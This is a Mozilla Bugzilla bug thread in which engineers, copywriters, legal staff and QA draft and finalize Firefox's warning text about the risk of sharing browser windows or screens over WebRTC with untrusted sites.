Closed Bug 1280403 Opened 8 years ago Closed 8 years ago

[copy] screensharing needs a string to warn users of enhanced risk of sharing firefox and your screen

Categories

(Core :: WebRTC: Audio/Video, defect, P1)

Product:
Core
Component:
WebRTC: Audio/Video
Type:
defect

Tracking

()

Status:
RESOLVED FIXED

People

(Reporter: shell, Assigned: mheubusch)

References

Details

(Whiteboard: [copy needed] screensharing)

Attachments

(1 file)

Talky Warning Message.png
66.83 KB, image/png
Details
screensharing needs a string to warn users of enhanced risk of sharing firefox and your screen. a proposal from Privacy and webRTC folks is below (Tanvi, mt, jesup, mreavy). does matej or someone from copy have suggestions to make this more clear while still conveying the risk? the technical implementation of the UX is starting. the string is the only blocking item. a time sensitive priority. Proposal: Sharing (Firefox|Screens) could give this site access to all your online data. with Learn More link somewhere UX change: Icon shown on drop down list for firefox and screen - to differentiate and again before the warning string UX:(click on Firefox) https://mozilla.invisionapp.com/share/AF71R266U#/screens/152779760 string discussion: https://public.etherpad-mozilla.org/p/screensharingcopy historical summary of the problem and related bugs https://docs.google.com/document/d/1-pshtAWrZgkF4Nu16hrspVYpXoKwo5hsybqpKE05H8E/edit#
Flags: needinfo?(matej)
Summary: [copy bug] screensharing needs a string to warn users of enhanced risk of sharing firefox and your screen → [copy] screensharing needs a string to warn users of enhanced risk of sharing firefox and your screen
Rank: 10
Flagging Michelle to have a look at this.
Flags: needinfo?(matej) → needinfo?(mheubusch)
(In reply to Matej Novak [:matej] from comment #1) > Flagging Michelle to have a look at this. Here is my recommendation: Sharing (Firefox | Screens) may expose your personal information. Learn more about this risk Here is my rationale. If I have misunderstood the functionality, please reach out so we can discuss: IIUC, sharing a screen will allow that site to "see" and even "snapshot" what happens during the share and any information that is viewed, even if only for a second (e.g., I click on a link to open an email and my entire gmail inbox opens and shows all of the emails in the inbox and I close it immediately but the screen shot already happened, so in theory someone could take a screen grab of the session and have a list of all the people/companies I've rec'd emails from.) So they will witness everything you do but they only *may* access your personal information if you display it through your browsing. The other party to the screen share does not gain control of your system, correct? Or can't place malware on your device to access passwords or keystrokes, correct? If so, I want to communicate that there are risks and am using the word "expose" because I think it connotes something morevealing tha "display" recommendation.
Flags: needinfo?(mheubusch)
No, the risk is so much worse. That's why this wording is so hard, because people with *some* technical understanding, get the risk all wrong. The site can't merely see where you drive, to use a car analogy, you're handing the keys to the site. Once the site can see your screen, it no longer needs you. As long as a visible tab is visiting it, the site can now jump to URLs as if it were you - the logged in you - quickly see the rendered results, grab it, and send it, before you can say "wha...". For instance, it could open: https://secure.bankofamerica.com/myaccounts/banking/overview and if you happened to be (always) logged in to one of the largest banks in the world, it could snap your actual account information. Screensharing effectively does an end-run around cross origin protections.
Combined with camera access, this is quite powerful, since it can wait to do this until it sees you're not looking.
Thank you for the explanation, Jan-Ivar. Makes sense. So we need to convey that it can both see what you are doing and also act as you. My reco: Sharing (Firefox|Screens) could give this site access to your online accounts and personal information. Learn more about this risk If that is too long, then just: Sharing (Firefox|Screens) could give this site access to your online accounts and information. Learn more
Well, this sounds suitably terrifying, but I'm not sure it really is informed consent. How would a reasonable person go from this to knowing whether to click yes or no?
Hi Eric, I may have misunderstood the requirements (informed consent) for this message. I will follow up with you outside of this bug to discuss.
This is fine. It's concise, accurate, and terrifying. If that gives people pause, or even causes them to try to understand the risks, great. I expect though that it will more likely prompt a decision based on trust. I know that people are very bad at that, but ultimately, that's all we've got. For the record, when we discussed this the conclusion was that the baseline was installing a web extension or addon. This is close enough to that baseline. Informed consent is a dream. I imagine that we could study this and learn that some non-trivial proportion of people confronted with this message don't even read it. In other words, no matter what we do, we won't reach everyone.
As long as "Learn more about this risk" links to comment 3 or very similar, I'm ok with the last wording.
So Jan-Ivar, you raise a good point and one I forgot to ask sooner - where does the Learn more link? I assumed that there was a destination for this. Is there one or is one planned? If not, can you point to someone I could discuss with (someone on the SUMO team, perhaps)?
Given the severity of the risk, have we considered not offering this as a feature? Do the benefits and use cases outweigh what could potentially happen to a user if they don't understand what's at stake?
(In reply to Matej Novak [:matej] from comment #11) > Given the severity of the risk, have we considered not offering this as a > feature? Do the benefits and use cases outweigh what could potentially > happen to a user if they don't understand what's at stake? That's not viable. It's a critical feature for essentially every commercial videoconferencing system.
Also, we already offer it, the only question is under what conditions we allow it.
(In reply to mheubusch from comment #10) > where does the Learn more link? I assumed that there was a destination for this. I don't know. My understanding is we have the link to save space only. Personally, I'd prefer it expanded additional text a la comment 3 that is all local and in the browser already. Otherwise I fear users aren't going to bother, and back out before the remote page loads, as people are impatient (I know it's what I would do), and that would be bad here. That page in turn could have a link to a mozilla hosted page with full information if we wanted.
Hi Florian - I'm pretty new to bugzilla, so just checking in to make sure you don't still need anything from me. The copy I propose for this bug is: Sharing (Firefox|Screens) could give this site access to your online accounts and personal information. IIUC, there is no link to learn more. Please let me know if you need further info on this. I will also create a separate bug to have legal review this warning to make sure it's ok.
(In reply to mheubusch from comment #15) > Hi Florian - I'm pretty new to bugzilla, so just checking in to make sure > you don't still need anything from me. The copy I propose for this bug is: > > Sharing (Firefox|Screens) could give this site access to your online > accounts and personal information. Asking a couple questions to be completely sure I understand what you mean: You are suggesting we use 2 different strings depending on whether a whole screen has been selected, or Firefox has been selected: "Sharing Screens could give this site access to your online accounts and personal information." (is the capitalized S on 'Screens' intentional?) "Sharing Firefox could give this site access to your online accounts and personal information." (I assume "Firefox" here is actually &brandShortName; ie. it will be replaced with 'Firefox' or 'Nightly' or 'FirefoxDeveloperEdition' depending on which kind of build the user is running?) > IIUC, there is no link to learn more. Please let me know if you need > further info on this. I will also create a separate bug to have legal review > this warning to make sure it's ok. The UX mockup at https://mozilla.invisionapp.com/share/AF71R266U#/screens/152779760 has no 'Learn more' link, so this is what I'm going to implement, unless I hear that we need such a link (I think a few people who commented on this bug would like us to have one). If we do add one, someone will need to figure out which text we display on the page that opens when clicking the link (in reply to comment 14: it could be a local about: page so that it displays immediately).
Thanks for asking, Florian. please lowercase the S in screens: Sharing screens could give this site access please use &brandShortName I'll stay tuned to learn whether or not we will have a link to learn more. Do you know whose decision that is to make?
I think we should have a Learn More link where users could go if they care to read more about the issue. Bryan, does that sound okay to you?
Flags: needinfo?(bbell)
On second thought, I still worry users will read this and think the thread it comment 2, not comment 3. Would there be room to include the following: Sharing (Firefox|Screens) could give this site access to your online accounts and personal information, by impersonating you. What I hope the last three words help convey is that this isn't just dangerous territory where one can remain safe by taking only prudent actions, rather a malicious site can actively take action on the user's behalf without their involvement, to steal information.
s/thread/threat/
I also hope this would peak people's interest enough to read more.
(In reply to Jan-Ivar Bruaroey [:jib] from comment #19) > On second thought, I still worry users will read this and think the thread > it comment 2, not comment 3. > > Would there be room to include the following: > > Sharing (Firefox|Screens) could give this site access to your online > accounts > and personal information, by impersonating you. I think it's not really a matter of "room" but more of user attention. The longer the text, the least likely users are to actually read it before clicking the share button. I also don't really see a difference in meaning between "access your online accounts" and "impersonating you".
The string doesn't say "site may access your online account", it says "could give this site access to your online account". That's passive, and plays into the misconception of comment 2 that the user is in control. I agree with Michelle in comment 5 that we need to convey that it can both see what you are doing and also act as you, and the current text doesn't succeed at the latter IMHO.
Hi All - I've reached out to legal to weigh in on the best way to convey the risk, as well. I'll update this bug with what I get back. But also alerted legal to the conversation in this thread.
assigning to Michelle based on previous conversations with Matej that she will own the final copy. the discussion in London with Tanvi and Martin ether pad is below https://public.etherpad-mozilla.org/p/screensharingcopy
Assignee: nobody → mheubusch
Jan-Ivar, can you explain exactly how a screensharing extension can click on links in other tabs? As I understand it, screensharing extensions simply get an image of the screen. They could get the co-ordinates of a link in another tab, but there would be no way of actually forcing a click in another tab hosted on a different domain (unless there is some other vector that I'm not aware of, which is entirely possible). My preference would be to just make the ongoing screensharing notification more prominent. Perhaps say something like "Your screen is being shared with www.randomsite.com".
If the user is still pointed at the site, then the site can put whatever it wants on the screen at any time, from any origin. That people keep underestimating this threat is a reason for a stronger warning, not a weaker one.
Final messaging is in review with legal now. Think I'll have something appropriately strong approved soon.
(In reply to mheubusch from comment #28) > Final messaging is in review with legal now. Think I'll have something > appropriately strong approved soon. Comment 28 looks like you wanted to get back to us here, has there been progress?
Flags: needinfo?(mheubusch)
A couple of us did an iteration on this. How about: Sharing Firefox or Screens with a malicious site would let it actively browse as you and gather your online account and personal information! ?
(In reply to Jan-Ivar Bruaroey [:jib] from comment #30) > A couple of us did an iteration on this. How about: > > Sharing Firefox or Screens with a malicious site would let it actively > browse as you > and gather your online account and personal information! "actively browse" is both confusing and inaccurate I think. also, "as you and gather your" is broken That said, I'm not sure about what to say... Maybe "let it display and gather online account and personal information from other websites"
> also, "as you and gather your" is broken I'm sorry, I misread it (though that may mean it's not as clear as we'd like). The operative part is "browse as you" then "and gather ....". Perhaps a comma....
Hi - Sorry for any confusion - I thought the legal bug I initially filed for this was linked back to this item. For reference, it is https://bugzilla.mozilla.org/show_bug.cgi?id=1284971 The result of that bug is that the following language is approved by Elvin and Marshall: Only share [Firefox|screens] with sites you trust. Sharing lets deceptive sites steal your identity and private data. Learn more
Flags: needinfo?(mheubusch)
(In reply to mheubusch from comment #33) > Hi - Sorry for any confusion - I thought the legal bug I initially filed for > this was linked back to this item. For reference, it is > https://bugzilla.mozilla.org/show_bug.cgi?id=1284971 I can't access it (legal bugs are restricted by default), could you please cc me? > The result of that bug is that the following language is approved by Elvin > and Marshall: Only share [Firefox|screens] with sites you trust. Sharing > lets deceptive sites steal your identity and private data. Learn more So you want a 'learn more' link? What should it point to?
Flags: needinfo?(mheubusch)
(In reply to Florian Quèze [:florian] [:flo] from comment #34) > > The result of that bug is that the following language is approved by Elvin > > and Marshall: Only share [Firefox|screens] with sites you trust. Sharing > > lets deceptive sites steal your identity and private data. Learn more > > So you want a 'learn more' link? What should it point to? More specifically, do we want this to point to a SUMO page, or to an about: page within the browser that would always be there even on restricted networks?
(In reply to Florian Quèze [:florian] [:flo] from comment #35) > (In reply to Florian Quèze [:florian] [:flo] from comment #34) > > > > The result of that bug is that the following language is approved by Elvin > > > and Marshall: Only share [Firefox|screens] with sites you trust. Sharing > > > lets deceptive sites steal your identity and private data. Learn more > > > > So you want a 'learn more' link? What should it point to? > > More specifically, do we want this to point to a SUMO page, or to an about: > page within the browser that would always be there even on restricted > networks? We can actually go without the Learn more link. I will also follow up with Joni Savage to see if there is a plan for WebRTC info on the SUMO site. If/when there is I can put a new bug in to link to it.
Flags: needinfo?(mheubusch) → needinfo?(jsavage)
Thanks for following up with me, Michelle. We don't have plans for dedicated WebRTC content on SUMO yet, but we can get content up if anyone identifies a support-related need for it.
Flags: needinfo?(jsavage)
(In reply to mheubusch from comment #33) > Hi - Sorry for any confusion - I thought the legal bug I initially filed for > this was linked back to this item. For reference, it is > https://bugzilla.mozilla.org/show_bug.cgi?id=1284971 > > The result of that bug is that the following language is approved by Elvin > and Marshall: Only share [Firefox|screens] with sites you trust. Sharing > lets deceptive sites steal your identity and private data. Learn more Could you cc me as well? This still sounds like someone thinks the risk is comment 2, when it is comment 3.
(In reply to Jan-Ivar Bruaroey [:jib] from comment #38) > (In reply to mheubusch from comment #33) > > Hi - Sorry for any confusion - I thought the legal bug I initially filed for > > this was linked back to this item. For reference, it is > > https://bugzilla.mozilla.org/show_bug.cgi?id=1284971 > > > > The result of that bug is that the following language is approved by Elvin > > and Marshall: Only share [Firefox|screens] with sites you trust. Sharing > > lets deceptive sites steal your identity and private data. Learn more > > Could you cc me as well? This still sounds like someone thinks the risk is > comment 2, when it is comment 3. Just shared. Can I propose what I think you want to see? Only share [Firefox|screens] with sites you trust. Sharing can allow deceptive sites to browse as you and steal your private data. Learn more The point here is while online they can "be" you. Let me know if I need to arrange another meeting with Legal and with Martin, Tanvi, and you.
Thanks Michelle, yes please, I like your copy, and it's just as short. It makes me want to Learn more. I think we need a message that both: 1. conveys the active threat of comment 3, and 2. cannot be misconstrued as the smaller threat in comment 2. I think the other copy still fails #2, because it's possible to steal the identity of a careless sharer solely through passive observation.
Flags: needinfo?(martin.thomson)
I think that the text in comment 39 works. Provided that it fits in the available space, including after translation into more verbose languages.
Flags: needinfo?(martin.thomson)
(In reply to Martin Thomson [:mt:] from comment #41) > I think that the text in comment 39 works. Provided that it fits in the > available space, including after translation into more verbose languages. Thanks, Martin - can you help me understand next steps here? Do I need to reopen the legal bug? Do I need to NI flod or delphine for validation?
Flags: needinfo?(martin.thomson)
Excellent question, to which I don't really know the answer. I would say that this is probably ready to leave with Maire's team.
Flags: needinfo?(martin.thomson) → needinfo?(mreavy)
I would say next steps are (1) to check with Florian that the copy (from comment 39) will fit in the existing layout (probably requires talking with one of our l10n folks to ask for translations that are likely to be the longest -- like German) -- if it doesn't, we may need to ask UX for some tweaks to get it to fit, (2) reopen the legal bug and get Legal (Elvin or Jishnu) to bless the updated text. I think we should do (1) and (2) at the same time. Florian -- Can you let us know if the new copy (from comment 39) will fit into the existing space? If I can help in any way (e.g. finding someone from l10n to translate the copy, etc), let me know. Michelle -- Can you reopen the legal bug and ask if the new copy is acceptable to Legal? If I'm not cc'd on the legal bug, can you add me? Thanks, everyone! I believe we're in the "homestretch" for landing all of this; we have a good shot of shipping this in Firefox 52 if we keep this prioritized high and stay focused. Please respond quickly if you're pinged with a question on this.
Flags: needinfo?(mreavy)
Flags: needinfo?(mheubusch)
Flags: needinfo?(florian)
(In reply to Maire Reavy [:mreavy] from comment #44) > Florian -- Can you let us know if the new copy (from comment 39) will fit > into the existing space? If I can help in any way (e.g. finding someone > from l10n to translate the copy, etc), let me know. I think it should be fine. Note: The copy in comment 39 has "learn more" again, when comment 36 said we don't need it.
Flags: needinfo?(florian)
(In reply to Florian Quèze [:florian] [:flo] from comment #45) > (In reply to Maire Reavy [:mreavy] from comment #44) > > > Florian -- Can you let us know if the new copy (from comment 39) will fit > > into the existing space? If I can help in any way (e.g. finding someone > > from l10n to translate the copy, etc), let me know. > > I think it should be fine. > > Note: The copy in comment 39 has "learn more" again, when comment 36 said we > don't need it. Good catch. Michelle -- to close the loop, can you clarify if the final copy will have "learn more" or any other link for the user to click on from the permission box?
There is not currently any copy to link to on SUMO. I think we should leave it off for now, and add it back once we determine what copy should appear on SUMO and when it will be live on the site. I will set up a meeting to discuss with Joni and will invite Maire to attend. Anyone else want/need to participate in that conversation?
Flags: needinfo?(mheubusch)
Thanks, Michelle. If you could invite Jan-Ivar, Martin, and Randell as optional attendees (so they know when and where it's happening if they are available), that should be sufficient. I assume we'll be discussing what copy/info we should put on SUMO?
Flags: needinfo?(mheubusch)
(In reply to Maire Reavy [:mreavy] from comment #48) > Thanks, Michelle. If you could invite Jan-Ivar, Martin, and Randell as > optional attendees (so they know when and where it's happening if they are > available), that should be sufficient. I assume we'll be discussing what > copy/info we should put on SUMO? Yes, what copy we need as well as where it should go within the site, what tags are needed to surface it to users who are just looking via search, and who is responsible for writing, reviewing, and approving copy. Also to set expectations around timing.
Flags: needinfo?(mheubusch)
Hello Florian - Maire, Jan-Ivar, Randell and I just met with Joni Savage on the SUMO team to discuss the content a user will see when they select the Learn more link. SUMO will publish that article sometime during the Aurora 52 release cycle - probably by mid-November, but not in time for the November 7 release of 52 Aurora. Since we will have the article shortly after release, does it make sense to still include the Learn more link in the Aurora release so that the string is in place and localized for Beta and GA? Joni can supply the URL where the article will appear with the caveat that the article will not appear there for about a week or two. Please advise. Thanks! -Michelle
Flags: needinfo?(jsavage)
Flags: needinfo?(florian)
(In reply to mheubusch from comment #50) > Hello Florian - Maire, Jan-Ivar, Randell and I just met with Joni Savage on > the SUMO team to discuss the content a user will see when they select the > Learn more link. SUMO will publish that article sometime during the Aurora > 52 release cycle - probably by mid-November, but not in time for the > November 7 release of 52 Aurora. Since we will have the article shortly > after release, does it make sense to still include the Learn more link in > the Aurora release so that the string is in place and localized for Beta and > GA? Joni can supply the URL where the article will appear with the caveat > that the article will not appear there for about a week or two. Yes, if we want the Learn more link, we should include it before November 7. Having the URL where the article will appear is useful. And it would be nice if that URL could point to a placeholder page with a 2-3 lines text rather than a 404.
Flags: needinfo?(florian)
Hi Florian, here's a placeholder link you can use: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/screenshare-safety (Just replace the version/os/locale tuple) I'll have a placeholder page up in a few seconds so it's not showing a 404. We'll have real content up around mid-November as Michelle mentioned.
Flags: needinfo?(jsavage)
QA Update I observe the Warning Message, however it does not appear consistently. Please reference attached screenshot. In Talky.io choose Screen Sharing The drop-down displays Talky: Select to share the Skype window - there is appropriate window preview - there is no Warning Message Talky: Select to share the Talky Nightly - there is appropriate window preview - there is a Warning Message Need Confirmation: Should the message only appear for Firefox windows?
Flags: needinfo?(sescalante)
Flags: needinfo?(florian)
(In reply to Michelle Funches - QA from comment #53) > Need Confirmation: Should the message only appear for Firefox windows? The message should appear for windows of the same Firefox process (ie. it won't appear if you attempt to share a Firefox window of Firefox started on another profile), or for entire screens.
Flags: needinfo?(florian)
We have the copy and will have a SUMO article up. Currently it is identical to the blog post on our WebRTC platform blog: https://blog.mozilla.org/webrtc/share-browser-windows-entire-screen-sites-trust/, but Joni will be tailoring it for a less technical audience before Fx52 goes to Beta.
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Flags: needinfo?(sescalante)
Flags: needinfo?(bbell)
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: